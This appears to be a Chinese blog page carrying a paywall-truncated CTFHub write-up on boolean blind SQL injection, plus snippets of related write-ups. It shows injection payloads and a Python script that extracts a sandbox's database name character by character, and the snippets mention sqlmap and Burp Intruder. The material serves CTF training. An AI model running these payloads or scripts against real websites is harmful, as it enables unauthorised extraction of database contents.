ctfhub-sql布尔盲注

最新推荐文章于 2025-05-15 17:46:59 发布
最新推荐文章于 2025-05-15 17:46:59 发布
阅读量844 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: sql mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_001/article/details/125089191

打开网址,先输入:

1 and length(database())>3

得到:

输入:

1 and length(database())<3

得到:

看出可以布尔盲注

查看当前表名:

import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,5):
    for i in range(43,126):
        ss="?id=1 and ascii(substr(database(),"+str(j)+",1))="+str(i)
        url=url1+ss
        pa=re.get(url=url).text
        if "query_success"in pa:
            st+=chr(i)
            break
print(st)

于是先得到当前数据库种包含的表名:

?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where
最低0.47元/天 解锁文章

200万优质内容无限畅学
CTFHub布尔盲注(新的payload)
weixin_44732566的博客
02-23 5671
CTFHub 布尔盲注 题目已经表明是布尔盲注,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔盲注不一样,一般布尔盲注(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
CTFHub (web-SQL-布尔盲注sqlmap)
m0_64444909的博客
05-09 919
一、关于sqlmap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语
CTFHUB技能树之SQL——布尔盲注
weixin_73049307的博客
10-16 1574
显示查询成功但没有回显出相关信息,初步判断是布尔盲注入、时间盲注或报错注入。还是没有回显,到这里已经可以确认是布尔盲注了,且是整数型注入。第一个字符是"f",后续就不多描述了,是flag表。第一个字符是"f",后续就不多描述了,是flag列。后续流程实在是太长了,就直接用sqlmap直接爆了。这里为了节省时间就直接爆第二个表的字符了。说明第一个字符是115,对应字符's'(因为知道是news表和flag表)(4)爆字段内容(flag)查询成功,说明表有两个。说明第一个字符是"c"得到数据库名长度是4。
CTFHUB-WEB-SQL注入-布尔盲注
weixin_43486981的博客
08-10 1626
知识点: Burp suite爆破模块intruder的设置: Positions设置 attack type:攻击模式设置 sniper:对变量依次进行破解。多个标记依次进行。单参数爆破,多参数时同一个字典按顺序替换各参数,总之初始值有一个参数不变。 battering ram:对变量同时进行破解。多个标记同时进行。多参数同时爆破,但用的是同一个字典。 pitchfork:每一个变量标记对应一个字典,取每个字典的对应项。 多参数同时爆破,但用的是不同的字典。 cluster bomb:每个变量对应一个字
CTF Web BugKu sql注入布尔盲注+绕过)
最新发布
2301_79806187的博客
05-15 995
尝试username=admin,显示“password error!尝试username=hhh,显示“username does not exist!尝试username=hhh'or'1显示“password error!”,那么注入点在username中,布尔盲注。构建注入语句的时候发现还会回显illegal character,说明有过滤。利用bp和sql字符过滤字典初步筛选出过滤的字符,如下图后来尝试的时候又发现了for也被过滤了。我的思路:布尔盲注的两个关键点就是截取字符串和比较。
CTFhub布尔盲注
ndjnddjxn的博客
04-12 1556
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 1166
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
CTFhub 报错注入
plant1234的博客
06-16 300
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
SQL注入学习记录 CTFHub SQL注入 布尔盲注
qq_45653588的博客
05-27 1381
一、布尔盲注 可以进行SQL注入,但是不能通过SQL注入漏洞看到数据库中的信息,但是可以通过回显的真假判断数据库中的信息。 用到的函数: Length()函数 返回字符串的长度 Substr()截取字符串,有三个参数,第一个是要截取的字符串,第二个是从第几个字符开始,第三个是一次截取多少个字符 二、做题 打开后还是熟悉的界面: 我们先输入1: 只是返回了一个query_success,没有回显其他内容。输入1'则返回了query_success。 于是我们只能一个一个猜他的名称。 我们可以通过leng
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 970
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1018
CTFHUB SQL
布尔盲注ctfhub
2401_82985722的博客
03-27 2283
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
CTFHub-web(sql布尔盲注)
分享与记录
07-22 5085
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔注盲注,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
CTFHUB-布尔盲注
Web学习之路
03-24 1476
true 与 false
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 2038
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数型注入,确定此题为整数型注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
ctfhub 布尔盲注
plant1234的博客
06-17 1781
布尔盲注: 布尔盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schem
CTFHub技能树--sql注入布尔盲注步骤详解
wqatss的博客
11-22 2221
解题步骤:库->表->列->数据
ctfhub里面的布尔注入题目怎么解
05-01
嗯,用户问的是CTFHub平台上的布尔盲注题目怎么解决。我需要先回忆一下布尔盲注的基本原理。布尔盲注属于SQL注入的一种,通常在页面没有显式错误信息,但会根据查询结果的布尔值(真或假)返回不同响应的情况下使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值